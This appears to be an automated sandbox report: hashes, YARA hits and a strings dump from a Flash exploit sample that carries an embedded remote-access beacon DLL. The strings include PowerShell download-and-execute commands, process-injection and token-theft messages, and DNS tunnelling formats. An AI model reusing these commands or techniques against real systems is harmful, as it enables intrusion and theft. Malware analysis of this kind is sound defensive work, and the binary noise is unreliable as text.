Sample details: add01ee7e871530c6f8621435b5bd862 --

Hashes
MD5: add01ee7e871530c6f8621435b5bd862
SHA1: d213e21168790f496a08427f9f58559b9b980cd7
SHA256: 4b4b7985fdb963e8b27abcf3b32b83fa7d2fc2398e6c59bef52bf6c03ab376f4
SSDEEP: 3072:Njh9N4a1j712h9Td2+1lxvTeZna8xUhUbT15Qwxhp:NjdFKdoSxvixTxUAzJ
Details
File Type: data
Yara Hits
CuckooSandbox/shellcode | CuckooSandbox/embedded_pe | CuckooSandbox/embedded_win_api | YRP/powershell | YRP/maldoc_find_kernel32_base_method_1 | YRP/maldoc_getEIP_method_1 | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/ThreadControl__Context | YRP/anti_dbg | YRP/inject_thread | YRP/create_service | YRP/network_http | YRP/network_dns | YRP/escalate_priv | YRP/win_registry | YRP/win_token | YRP/win_files_operation | YRP/Prime_Constants_long | YRP/RijnDael_AES | YRP/BASE64_table | YRP/VC8_Random | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/Str_Win32_Internet_API | YRP/Str_Win32_Http_API | FlorianRoth/PowerShell_Susp_Parameter_Combo | FlorianRoth/WiltedTulip_ReflectiveLoader |
Strings
		<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
    <rdf:Description xmlns:dc="http://purl.org/dc/elements/1.1" rdf:about="">
        <dc:format>application/x-shockwave-flash</dc:format>
        <dc:title>Adobe Flex 4 Application</dc:title>
        <dc:description>http://www.adobe.com/products/flex</dc:description>
        <dc:publisher>unknown</dc:publisher>
        <dc:creator>unknown</dc:creator>
        <dc:language>EN</dc:language>
        <dc:date>Feb 6, 2018</dc:date>
    </rdf:Description> </rdf:RDF>
flash02
!This program cannot be run in DOS mode.
rERich
`.rdata
@.data
@.reloc
D$HSVWh
QQSVW3
SWjD_W
tSVWjD^V3
SVWjD_W
0VVVVV
SSShSF
QSVWj$Z
tcj@ShI
tDHt(HuV
PSSSSSSh 
YYSSPhr
8<+tz<-tz
D$,PSP
0SSSSS
PRSVWj
YY_^[ZX
HHtXHHt
>If90t
HHtYHHt
0A@@Ju
<at9<rt,<wt
URPQQh
0WWWWW
j@j ^V
>=Yt1j
< tK<	tG
0SSSSS
0SSSSS
0SSSSS
^SSSSS
j"^SSSSS
v	N+D$
t"SS9]
PPPPPPPP
PPPPPPPP
tGHt.Ht&
^SSSSS
8VVVVV
;t$,v-
UQPXY]Y[
t+WWVPV
u8VVVVj
0WWWWW
AAFFf;
>=Yt1j
rijndael
=j&&LZ66lA??~
}{))R>
f""D~**T
V22dN::t
o%%Jr..\$
,cccc||||wwww{{{{
kkkkoooo
gggg++++
YYYYGGGG
&&&&6666????
uuuu				
nnnnZZZZ
RRRR;;;;
[[[[jjjj
9999JJJJLLLLXXXX
CCCCMMMM3333
PPPP<<<<
~~~~====dddd]]]]
ssss````
""""****
2222::::
$$$$\\\\
7777mmmm
llllVVVV
eeeezzzz
xxxx%%%%....
pppp>>>>
ffffHHHH
aaaa5555WWWW
UUUU((((
BBBBhhhhAAAA
='9-6d
_jbF~T
11#?*0
,4$8_@
t\lHBW
RRRR				jjjj
00006666
CCCCDDDD
TTTT{{{{
####====
ffff((((
vvvv[[[[
IIIImmmm
%%%%rrrr
]]]]eeee
llllppppHHHHPPPP
FFFFWWWW
kkkk::::
AAAAOOOOgggg
tttt""""
nnnnGGGG
VVVV>>>>KKKK
yyyy    
YYYY''''
____````QQQQ
;;;;MMMM
ccccUUUU!!!!
}}}}cc
&&Lj66lZ??~A
99rKJJ
==zGdd
""Df**T~
;22dV::tN
$$Hl\\
C77nYmm
%%Jo..\r
55j_WW
&Lj&6lZ6?~A?
~=zG=d
"Df"*T~*
2dV2:tN:
x%Jo%.\r.
a5j_5W
ggV}++
Lj&&lZ66~A??
bS11*?
Xt,,4.
RRvM;;
MMfU33
PPxD<<%
Bc!! 0
~~zG==
Df""T~**;
dV22tN::
xxJo%%\r..8$
pp|B>>q
aaj_55
UUPx((
QPeA~S
>4$8,@
p\lHtW
+HpXhE
T[$:.6
,4$8'9-6:.6$1#?*XhHpSeA~NrZlE
Sbt\lH
QeFbF~TiKwZ
4$8,9-6'.6$:#?*1hHpXeA~SrZlN
SbE\lHtQeF
F~TbKwZi
$8,4-6'96$:.?*1#HpXhA~SeZlNrSbE
lHt\eF
Q~TbFwZiK
8,4$6'9-$:.6*1#?pXhH~SeAlNrZbE
SHt\lF
QeTbF~ZiKw
"3DUfw
"3DUfw
"3DUfw
CorExitProcess
runtime error 
TLOSS error
SING error
DOMAIN error
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program: 
(null)
`h````
xpxxxx
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
ADVAPI32.DLL
`h`hhh
xppwpp
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
UTF-16LE
UNICODE
Unknown Runtime Check Error
Stack memory around _alloca was corrupted
A local variable was used before it was initialized
Stack memory was corrupted
A cast to a smaller data type has caused a loss of data.  If this was intentional, you should mask the source of the cast with the appropriate bitmask.  For example:  
	char c = (i & 0xFF);
Changing the code in this way will not affect the quality of the resulting optimized code.
The value of ESP was not properly saved across a function call.  This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.
Stack around the variable '
' was corrupted.
The variable '
' is being used without being initialized.
Run-Time Check Failure #%d - %s
Unknown Module Name
Unknown Filename
Stack corrupted near unknown variable
Stack around _alloca corrupted
Local variable used before initialization
Stack memory corruption
Cast to smaller type causing loss of data
Stack pointer corruption
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
MSPDB80.DLL
EnvironmentDirectory
SOFTWARE\Microsoft\VisualStudio\9.0\Setup\VS
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
PDBOpenValidate5
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
CONOUT$
cdn.%x%x.%s
www6.%x%x.%s
%s.1%x.%x%x.%s
%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x%08x.%x%x.%s
%s.1%08x%08x%08x.%x%x.%s
%s.1%08x%08x.%x%x.%s
%s.1%08x.%x%x.%s
api.%x%x.%s
unknown
could not run command (w/ token) because of its length of %d bytes!
could not spawn %s (token): %d
could not spawn %s: %d
Could not open process token: %d (%u)
could not run %s as %s\%s: %d
COMSPEC
could not upload file: %d
could not open %s: %d
could not get file time: %d
could not set file time: %d
127.0.0.1
Could not connect to pipe (%s): %d
Could not open service control manager on %s: %d
Could not create service %s on %s: %d
Could not start service %s on %s: %d
Started service %s on %s
Could not query service %s on %s: %d
Could not delete service %s on %s: %d
SeDebugPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeUnsolicitedInputPrivilege
SeMachineAccountPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeSyncAgentPrivilege
SeEnableDelegationPrivilege
SeManageVolumePrivilege
Could not create service: %d
Could not start service: %d
Failed to impersonate token: %d
Failed to get token
IsWow64Process
kernel32
Could not open '%s'
copy failed: %d
move failed: %d
D	0	%02d/%02d/%02d %02d:%02d:%02d	%s
F	%I64d	%02d/%02d/%02d %02d:%02d:%02d	%s
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
could not allocate %d bytes in process: %d
could not write to process memory: %d
could not adjust permissions in process: %d
could not create remote thread in %d: %d
could not open process %d: %d
%d is an x64 process (can't inject x86 content)
%d is an x86 process (can't inject x64 content)
syswow64
system32
Could not set PPID to %d: %d
Could not set PPID to %d
NtQueueApcThread
process
Could not connect to pipe: %d
%d	%d	%s
Kerberos
kerberos ticket purge failed: %08x
kerberos ticket use failed: %08x
could not connect to pipe: %d
could not connect to pipe
Maximum links reached. Disconnect one
%d	%d	%d.%d	%s	%s	%s	%d	%d
Could not bind to %d
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
%%IMPORT%%
Command length (%d) too long
IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
powershell -nop -exec bypass -EncodedCommand "%s"
?%s=%s
%s&%s=%s
%s%s: %s
Could not kill %d: %d
%s	%d	%d
%s	%d	%d	%s	%s	%d
sha256
abcdefghijklmnop
could not create pipe: %d
I'm already in SMB mode
%s (admin)
Could not open process: %d (%u)
Failed to impersonate token from %d (%u)
Failed to duplicate primary token for %d (%u)
Failed to impersonate logged on user %d (%u)
Could not create token: %d
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: %d
Microsoft Base Cryptographic Provider v1.0
?456789:;<=
 !"#$%&'()*+,-./0123
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq
LibTomMath
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/
GetTickCount
GetLocalTime
GetCurrentProcessId
CreateFileA
WaitForSingleObject
SetFileTime
WriteFile
OpenProcess
CreateProcessA
GetEnvironmentVariableA
DisconnectNamedPipe
FlushFileBuffers
SetCurrentDirectoryA
GetStartupInfoA
GetLastError
GetCurrentDirectoryW
CreatePipe
GetCurrentDirectoryA
GetFileTime
CloseHandle
GetCurrentProcess
ConnectNamedPipe
GetCurrentThread
ReadFile
GetProcAddress
CreateNamedPipeA
GetModuleHandleA
GetVersionExA
CreateThread
GetFullPathNameA
SystemTimeToTzSpecificLocalTime
GetLogicalDrives
ExpandEnvironmentStringsA
GetFileAttributesA
FileTimeToSystemTime
FindFirstFileA
CopyFileA
FindClose
MoveFileA
FindNextFileA
DeleteProcThreadAttributeList
HeapAlloc
UpdateProcThreadAttribute
HeapFree
GetProcessHeap
CreateRemoteThread
VirtualAlloc
VirtualProtectEx
VirtualAllocEx
ProcessIdToSessionId
VirtualProtect
DuplicateHandle
InitializeProcThreadAttributeList
WriteProcessMemory
GetThreadContext
SetThreadContext
FreeLibrary
VirtualFree
Thread32First
Thread32Next
SetLastError
LoadLibraryA
OpenThread
CreateToolhelp32Snapshot
SuspendThread
ResumeThread
PeekNamedPipe
WaitNamedPipeA
SetNamedPipeHandleState
LocalAlloc
LocalFree
GetComputerNameA
Process32First
TerminateProcess
Process32Next
KERNEL32.dll
CreateProcessAsUserA
CloseServiceHandle
OpenProcessToken
CreateProcessWithLogonW
DeleteService
CreateServiceA
StartServiceA
CreateProcessWithTokenW
QueryServiceStatus
OpenSCManagerA
OpenServiceA
OpenThreadToken
LookupPrivilegeValueA
ImpersonateLoggedOnUser
ImpersonateNamedPipeClient
QueryServiceStatusEx
ControlService
AdjustTokenPrivileges
GetUserNameA
InitializeSecurityDescriptor
SetSecurityDescriptorDacl
GetTokenInformation
LookupAccountSidA
DuplicateTokenEx
AllocateAndInitializeSid
RevertToSelf
FreeSid
CheckTokenMembership
LogonUserA
ADVAPI32.dll
HttpQueryInfoA
InternetConnectA
InternetQueryDataAvailable
InternetReadFile
InternetSetOptionA
HttpOpenRequestA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
InternetQueryOptionA
WININET.dll
WS2_32.dll
DnsQuery_A
DnsFree
DNSAPI.dll
GetIfEntry
GetIpAddrTable
IPHLPAPI.DLL
LsaLookupAuthenticationPackage
LsaConnectUntrusted
LsaCallAuthenticationPackage
Secur32.dll
GetModuleHandleW
ExitProcess
MultiByteToWideChar
DeleteFileA
CreateDirectoryA
RemoveDirectoryA
GetCurrentThreadId
GetCommandLineA
GetSystemTimeAsFileTime
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
HeapCreate
HeapDestroy
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
HeapReAlloc
GetStdHandle
GetModuleFileNameA
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
InterlockedIncrement
InterlockedDecrement
InitializeCriticalSectionAndSpinCount
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
RtlUnwind
WideCharToMultiByte
GetConsoleCP
GetConsoleMode
SetHandleCount
GetFileType
SetFilePointer
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
RaiseException
DebugBreak
HeapSize
GetLocaleInfoA
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
SetStdHandle
GetModuleFileNameW
VirtualQuery
SetEndOfFile
CompareStringA
CompareStringW
SetEnvironmentVariableA
CryptReleaseContext
CryptAcquireContextA
CryptGenRandom
SetEnvironmentVariableW
beacon.dll
_ReflectiveLoader@4
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ihihikiaikihikh
ijikimiin
imikimiyiAilihikiiioihiki
inijhiY
dhhhlij
#8m,kjhihiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiaijhi
DXPP]X]G
DXPP]XZG
DXPP]X[G
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii`iji
F\GYIA
RI$: ,IXYGYRI>
I'=I_GXRI>&>_]RI=
F_GYRI$(:9@iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiciji)F66
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiibijhiiiimiiikiiifiiikiiifiiikiiiciiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiieijhiiii`iii{
T<(D[[Y[_Y]D[iii`iiin
TXiii`iiiy
T :&DQQ\PDXiii`iiif
XY[]iii`iiie
iii`iiib
D<:iiiniiiiiiidiiikiiio66
iiiliiil
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiidijhiiiiniiiiiiikiiio<(D[[YiiihiiikD[iiiliiil
iii`iiin
TXiii`iiiy
T :&DQQ\PDXiii`iiif
XY[]iii`iiie
iii`iiib
D<:iiiniiihiiidiiikiiio66
iiiliiil
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiitiji)L
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiwiji)L
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiifiji
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiivihikihizikimiiiii}ikimiiiiisijiy.,=iiiiiiiiiiiiiirijiy.,=iiiiiiiiiiiiiiuikimiii	iJihikikiyihikiiixihikiii{ihikiiiMihikijii
D$$[[aYZQ
6QQh8h
AQAPRQVH1
AXAX^YZAXAYAZH
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
3p3t3x3|3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
5"5H5f5
7M7c7u7
708g8s8
81989c9
:):0:D:Q:V:\::;Q;k<
>)?S?Y?a?
*0E0J0b0m0
2*2G2|2
4%4P4g4
5M5X5m5w5
7e7o7~7
7"808v8
9&929B9
<@<J<Y<A=
!0H0U0~0
304<4H4S4g4
5:5G5S5b5p5v5
6*6;6]6
707C7T7c7
878W8~8
9!9(9/969=9D9K9R9Y9`9g9n9u9|9
:A:H:O:s:x:
:	;.;4;L;];~;
<&<,<9<J<|<
>8?F?s?
1I1C2M2S2
2_3t3{3
4"5e5j5p5w5
6G6^6g6s6
6E7Q7[7
858?8E8r8
8?9I9n9
9!:3:i:
:	;C;T;];o;
>.?5?G?M?
I0e0x0
2&2`2h2
233P3`3
4X5]5c5o5
8(8F8[8
999M9f9):5:;:
:4;?;M;R;X;j;t;
;"<k<y<
?L?R?X?^?d?w?
1,1@1P1V1h1
2*2/2h2
2>3N3j3
<'<C<W<y<
>)?3?Y?n?
4A5E5I5M5Q5U5Y5]5a5e5i5m5q5u5
8#8D8[8
9+9=9C9
:0;E;d;v;
5"555?5s5
556E6X6
8%8+818M8S8X8^8o8
8.9N9T9u9~9
:&:`:j:p:
;#<9<@<S<Z<
<$=0=7=L=V=]=w=
>S>d>n>t>
4$4>4N4}4
0"0*020:0G0W0b0B2V2
2b3p3|3
3)42474R4Z4e4q4
4J5k5w5
606W6k6~6
7A8W8b8x8
42484j4~4
666Q6Z6g6q6
6(7G7c7
9+9C9s9
9#:=:Y:v:
<.<<<0=>=K=[=j=}=
F091=1A1E1I1M1Q1U1Y1]1a1e1i1m1q1Y2p2~2
4_7c7g7k7o7s7w7{7
 7p7e;
0&010X0_0o0z0
4/464F4Q4s4z4
5*555W5^5n5y5
6g6n6~6
:&:H:O:_:j:
;,;3;C;N;p;w;
;P<f<}<
6 6M6h6n6w6~6
7%7*7:7D7K7V7_7u7
8 8J8O8Z8_8}8
;a;i;~;
<)=f=n=
:1:8:<:@:D:H:L:P:T:
;!;<;C;H;L;P;q;
;:<@<D<H<L<^=c=m=
>.>^>z>
*0_0x0
1 1$1n1t1x1|1
2 2A2k2
e9i9m9q9u9y9}9
9>;L;`<
=%=-=9=B=G=M=W=`=k=w=|=
>b>g>u>}>
?1???E?h?o?
3 3/383E3P3b3u3
4"4'404=4C4]4n4t4
8%9j9=;H;P;e;
=:>?>g>
k0r0$1
>&>2>G>N>b>i>
?)?/?8?D?R?X?d?j?w?
!0a0g0
1$242:2F2L2\2b2w2
3 3$3*3/353:3I3_3j3o3z3
6 7W7b7
9j:s:y:
;!;*;?;o;
<;=O=u=
:3<D<~<
="=5=Y=
0	0 090U0^0d0m0r0
3^4d4~4
5)5>5H5n5
9A9Q9~9
9):5:A;w;
=(>??S?t?z?
0K0U0}0
4Q5H6Q6]6
647=7I7a7p7
<*<N<V<
=%>T>u>
>)?\?{?
3'353;3K3P3h3n3}3
484U4%6,626
5 5B5T5f5x5
4'4E4O4X4c4x4
6&777r7
7"80898y8
8"9T9\9
9':^:h:
<.<b<h<t<
>'>9>[>
>!?:?C?
0$0*000w01181
8$8+8=8
:Y;o;y;
p3t3x3|3
4(4,4044484<4
p8t8x8|8
@?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
0 0$0(000
4 4@4\4`4
5,505P5l5p5
606<6X6x6
74787X7x7
8 8@8`8
3$3,343<3D3L3T3\3d3l3p3t3
8@9P9`9p9
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>x>
shellcodBytes
MainExp
MainExp
data14
data15<C:\Users\Miha\AdobeMinePoC_tryingToEvadeSecSolutionsfla01.as
data3	ByteArray
flash.utils
Endian
LITTLE_ENDIAN
endian
Capabilities
flash.system
version
replace!http://adobe.com/AS3/2006/builtin
MainExp.as$0
flash.display:Sprite$flash.display:DisplayObjectContainer
flash.display:InteractiveObject
flash.display:DisplayObject
flash.events:EventDispatcher
Number
class_1
MainExp/MainExp
isDebugger
flash10
MainExp/flash21
__go_to_definition_help
flash21
flash.display
Sprite
Object
EventDispatcher
flash.events
DisplayObject
InteractiveObject
DisplayObjectContainer
__go_to_ctor_definition_help
flash.utils	ByteArray!http://adobe.com/AS3/2006/builtin	writeByte
toString
Object
String
name_2
name_1
shellcodBytes
:MainExp
UAFGenerator
MainExp:flash21
:MainExp/MainExp>
`)0` 0`!0`"0`#0`
]0]1J1
0^1`?a1G
UAFGenerator
;C:\Users\Miha\AdobeMinePoC_tryingToEvadeSecSolutionsfla0.as
flash0$0
param1
method_2
LocalConnection	flash.net
connect
var_13
DRM_obj
flash.utils
var_14
method_1
addEventListener
MainExp
flash0/flash0
data14
com.adobe.tvsdk.mediacore
PSDKEventDispatcher
createDispatcher
createMediaPlayer
var_15
var_16
drmManager
initialize
flash0/flash22
Capabilities
flash.system
isDebugger
flash24
flash25
flash0/flash23
flash.events
TimerEvent
Mem_Arr
var_17
length
flash26
var_18
Endian
LITTLE_ENDIAN
endian
Primit
flash20
flash0/flash24
flash21
flash0/flash25
__go_to_definition_help
MediaPlayer
Object
__go_to_ctor_definition_help
name_1
name_2
name_7
class_1
class_1!http://adobe.com/AS3/2006/builtin
UAFGenerator
:UAFGenerator
UAFGenerator:method_2
class_1.as$0
_loc1_
_loc2_
UAFGenerator:method_1
UAFGenerator:flash24
UAFGenerator:flash25
:UAFGenerator/UAFGenerator
+$activation
UAFGenerator.as$0
0]w`v0`vX
mx/core/IFlexAsset
BE:\dev\4.y\frameworks\projects\framework\src;mx\core;IFlexAsset.as
mx.core:IFlexAsset/IFlexAsset
mx.core
IFlexAsset
__go_to_definition_help
name_1
name_2
name_7
mx/core/ByteArrayAsset
mx.core:ByteArrayAsset
VERSION*http://www.adobe.com/2006/flex/mx/internal
4.6.0.23201
FE:\dev\4.y\frameworks\projects\framework\src;mx\core;ByteArrayAsset.as%mx.core:ByteArrayAsset/ByteArrayAsset
String
__go_to_definition_help
IFlexAsset
mx.core
ByteArrayAsset
flash.utils	ByteArray
Object
__go_to_ctor_definition_help
name_1
name_2
name_7
shellcodBytes
mx.core
ByteArrayAsset
Object	ByteArray
flash.utils
ExcludeClass
__go_to_ctor_definition_help
__go_to_definition_help
name_1
name_2
name_7!http://adobe.com/AS3/2006/builtin
shellcodBytes
:shellcodBytes
:shellcodBytes/shellcodBytes
flash3
"3DUfw
;C:\Users\Miha\AdobeMinePoC_tryingToEvadeSecSolutionsfla3.as
flash3/flash3
Number
flash27
Object
flash3/flash25
param1
flash3.as$109!http://adobe.com/AS3/2006/builtin
flash.utils:ByteArray
flash3/flash26
position
writeDouble
readUnsignedInt
flash3/flash27
__go_to_definition_help
flash25
flash26
flash.utils	ByteArray
__go_to_ctor_definition_help
name_1
name_2
name_7
Mem_Arr
Mem_Arr
f%]&f&
flash1
;C:\Users\Miha\AdobeMinePoC_tryingToEvadeSecSolutionsfla1.as
flash1/flash1
flash4
onDRMOperationComplete
flash28
flash1/onDRMOperationComplete
param1
param2
param3
param4
onDRMError
flash1/onDRMError
String
DRMOperationCompleteListener
com.adobe.tvsdk.mediacore
__go_to_definition_help
Object
__go_to_ctor_definition_help
name_1
name_2
name_7!http://adobe.com/AS3/2006/builtin
:onDRMOperationComplete
:onDRMError
DRM_obj
DRM_obj
DRM_obj
DRM_obj
0]<`:0`:X
Primit
Primit
flash21
flash39
flash27
flash70
Capabilities
flash.system
isDebugger
flash72
version
toUpperCase!http://adobe.com/AS3/2006/builtin
search
;C:\Users\Miha\AdobeMinePoC_tryingToEvadeSecSolutionsfla5.as
param1
position
readUnsignedInt
Primit/flash32
param2
writeUnsignedInt
Primit/flash34
Primit/flash35
Object
_loc2_
flash35
flash32
Primit.as$11
Primit/flash36	flash20$0
Mem_Arr
length
gadget
flash20
DRM_obj
Primit0
var_11
Primit/flash20
toString
Primit/hex
String
Primit/Primit
__go_to_definition_help
Boolean
flash34
flash36
method_3
__go_to_ctor_definition_help
name_1
name_2
name_7
var_19
var_19$
f0a/^1]
]>,LJ>
]9f9FB
']>,LJ>
a?]9f9
a:];f;f<
	^D]DfD$
aD]DfD$2
?]DfD$2
A]>,LJ>
]>,LJ>
[]KfKFL
_]>,LJ>
mx/core/mx_internal
CE:\dev\4.y\frameworks\projects\framework\src;mx\core;mx_internal.as
mx.core
mx_internal*http://www.adobe.com/2006/flex/mx/internal
name_1
name_2
name_7
gadget
gadget
Primit1
;C:\Users\Miha\AdobeMinePoC_tryingToEvadeSecSolutionsfla6.as
param1
gadget/flash1000
uint	gadget0$0
flash32
flash35
flash21
position
readUTFBytes
toLowerCase!http://adobe.com/AS3/2006/builtin
readUTF
var_12
gadget3
gadget/gadget0
param2
param3
_loc10_
_loc4_
_loc5_
_loc6_
_loc7_
_loc8_
_loc9_
_loc11_
_loc12_	flash1000
flash70
Vector
gadget.as$15
Primit
__AS3__.vec
flash34
flash36
gadget/gadget1	flash20$1	undefined
MainExp
data14
readUnsignedInt
length
method_4
method_5	flash2003	flash2005
gadget4
gadget7
gadget8
gadget9
res	flash2004
String
gadget/flash20
gadget/gadget
__go_to_definition_help
flash20
Object
__go_to_ctor_definition_help
name_1
name_2
name_7
kernel32.dll
virtualprotect
createprocessa
method_2
method_2
CreateProcessFunc
findfunc:
]N]L]WfWFL
0]<,lJ<
6]<,lJ<
	]WfWe
aD]WfW$
H]<,lJ<
Q]<,lJ<
aD]WfWFT
aD]WfWFT
q]<,lJ<
)]L]MfMFL
|]N]N]Nb
]GfG]@f@S
]>$AJ>
]BfBfC$
]BfBfCFE
]BfBfCfF
]GfG]@f@S
]<,lJ<
]L]MfMFL
]MfM ]_f_F
]<,lJ<
]6]7f7
0]5f50]5f5X
shellcodBytes
MainExp